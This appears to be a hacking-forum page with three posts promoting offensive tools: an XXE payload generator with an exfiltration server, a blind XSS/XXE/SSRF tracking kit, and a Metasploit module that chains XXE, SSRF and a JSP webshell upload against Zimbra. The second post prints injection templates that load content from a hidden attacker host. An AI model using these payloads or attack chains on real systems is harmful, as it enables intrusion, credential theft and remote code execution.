Search the Community

It generates the XML payloads, and automatically starts a server to serve the needed DTD’s or to do data exfiltration. Some notes: If you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included and will start a server to host them. Have in mind that if you use these options you should set the server address If you include content in the body of the XML have in mind that XML restricted characters like ‘<‘ may break the parsing so be sure to use CDATA or PHP’s base64encode Most of the languages limit the number of entity expansion, or the total length of the content expanded, so make sure you test XEE on your machine first, with the same conditions as the target. [hide][Hidden Content]]

Toolkit to detect and keep track on Blind XSS, XXE & SSRF SETUP Upload the files to your server. Create a Database and upload database.sql file to it. Change the DB Credentials in db.php file. Ready. USAGE BLIND XSS <embed src="[Hidden Content]; <script src="[Hidden Content]; BLIND XXE <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "[Hidden Content]; %ext; ]> <r></r> SSRF GET /testssrf.php=[Hidden Content] DEFAULT CREDENTIALS USER : [email protected] PASS : 123456 Source & Download [hide][Hidden Content]]

This Metasploit module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the zimbra account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the zimbra credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition. View the full article